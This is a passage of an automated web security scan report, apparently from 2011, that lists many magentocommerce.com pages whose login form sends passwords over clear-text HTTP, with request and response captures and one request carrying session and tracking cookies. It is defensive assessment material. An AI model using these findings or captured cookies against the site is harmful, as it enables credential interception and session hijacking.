Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fcompany%2Fpci-compliance%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:18 GMT
Content-Length: 35471

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.28. http://www.magentocommerce.com/company/press-releases  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/press-releases

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /company/press-releases HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:40 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175819; expires=Sat, 11-Aug-2012 15:03:40 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fcompany%2Fpress-releases%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:40 GMT
Content-Length: 41130

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.29. http://www.magentocommerce.com/company/press-releases/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/press-releases/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /company/press-releases/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175845; expires=Sat, 11-Aug-2012 15:04:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fcompany%2Fpress-releases%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:05 GMT
Content-Length: 41130

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.30. http://www.magentocommerce.com/company/privacy  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/privacy

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /company/privacy HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175832; expires=Sat, 11-Aug-2012 15:03:52 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A17%3A%22%2Fcompany%2Fprivacy%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:52 GMT
Content-Length: 49802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.31. http://www.magentocommerce.com/company/terms  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/terms

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /company/terms HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175839; expires=Sat, 11-Aug-2012 15:03:59 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fcompany%2Fterms%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:59 GMT
Content-Length: 41069

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.32. http://www.magentocommerce.com/de  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /de

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /de HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:44 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176483; expires=Sat, 11-Aug-2012 15:14:43 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fde%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:44 GMT
Content-Length: 69992

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- me
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.33. http://www.magentocommerce.com/demo  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /demo

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /demo HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175788; expires=Sat, 11-Aug-2012 15:03:08 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A6%3A%22%2Fdemo%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:08 GMT
Content-Length: 39549

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.34. http://www.magentocommerce.com/design_guide  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /design_guide

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /design_guide HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176273; expires=Sat, 11-Aug-2012 15:11:13 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A14%3A%22%2Fdesign_guide%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:13 GMT
Content-Length: 35263

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.35. http://www.magentocommerce.com/dk  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /dk

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /dk HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:16:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176568; expires=Sat, 11-Aug-2012 15:16:08 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fdk%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:16:09 GMT
Content-Length: 39933

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.36. http://www.magentocommerce.com/download  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /download

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /download HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/product/emerging-business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170943; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A1%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A2%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A3%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fservices%2Ftraining%2F%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.10.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:47:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171254; expires=Sat, 11-Aug-2012 13:47:34 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:47:34 GMT
Content-Length: 170988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.37. http://www.magentocommerce.com/download/diff  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /download/diff

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /download/diff HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176284; expires=Sat, 11-Aug-2012 15:11:24 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fdownload%2Fdiff%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:24 GMT
Content-Length: 70455

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.38. http://www.magentocommerce.com/download/login_form  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /download/login_form

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /download/login_form HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176319; expires=Sat, 11-Aug-2012 15:12:00 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A21%3A%22%2Fdownload%2Flogin_form%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:00 GMT
Content-Length: 5065

<div class="login-popup" id="registerWindow">
<div class="login-popup-cont">
<div class="col2-set">
<div class="col-1">
<h3>Login, it's Easy!</h3>

...[SNIP]...
</div>
<form action="http://www.magentocommerce.com/products/customer/account/loginPost/" method="post">
<input type="hidden" name="return_url" value="http://www.magentocommerce.com/download" />
...[SNIP]...
<dd><input type="password" id="fVal_password" class="fValidate['required'] input-text" name="login[password]" size="20" value="" maxlength="32" /></dd>
...[SNIP]...

2.39. http://www.magentocommerce.com/download/release_notes  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /download/release_notes

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /download/release_notes HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176308; expires=Sat, 11-Aug-2012 15:11:48 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fdownload%2Frelease_notes%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:49 GMT
Content-Length: 282941

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.40. http://www.magentocommerce.com/es  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /es

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /es HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176528; expires=Sat, 11-Aug-2012 15:15:28 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fes%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:28 GMT
Content-Length: 69388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.41. http://www.magentocommerce.com/fr  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /fr

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /fr HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:03 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176501; expires=Sat, 11-Aug-2012 15:15:01 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Ffr%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:03 GMT
Content-Length: 71918

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
